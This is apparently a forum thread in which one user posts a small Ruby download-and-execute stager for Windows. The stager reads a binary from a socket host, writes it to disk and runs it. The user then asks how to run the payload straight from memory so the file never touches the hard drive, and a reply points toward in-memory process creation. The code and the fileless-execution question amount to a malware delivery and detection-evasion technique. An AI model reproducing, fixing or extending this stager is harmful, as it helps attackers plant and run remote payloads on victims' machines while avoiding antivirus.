upload stager... technique?

[BigMac]

ill try to explain the best i can... (win32)

upload.exe.rb

Code:

sock = TCPSocket.open('666', '192.168.1.5')
  # read data from a socket then write to a file...
	data = sock.read
	destFile = File.open('c:\someplace\file.exe', "wb")
	destFile.print data.rstrip
	destFile.close

puts "executing payload"
exec = Thread.new { system "c:\someplace\file.exe" }
exec.run

sleep 100 #stay alive for a long time

this is a vary simple download and execute function... this client will read data from a host, write this data to a file and then execute the file...

so, now you have 2 process's running (client.exe and file.exe) instead of writing this data to a file i would like to execute this data from within client.exe

i dont want file.exe touching the hard drive, i just want to execute the binary data...

any ideas to better my search results?

[Gitsnik]

What you are trying to do is execute a program from a memory location.

I don't know how ruby does it (meterpreter is written in C, perhaps C++ if my SVN logs are correct), but doing it via a C call is "CreateProcess" and pointing the file pointer at a memory location - or something very similar.

Side Note: A lot of people immediately assume viral intent when you write one of these, be careful where you start googling this information!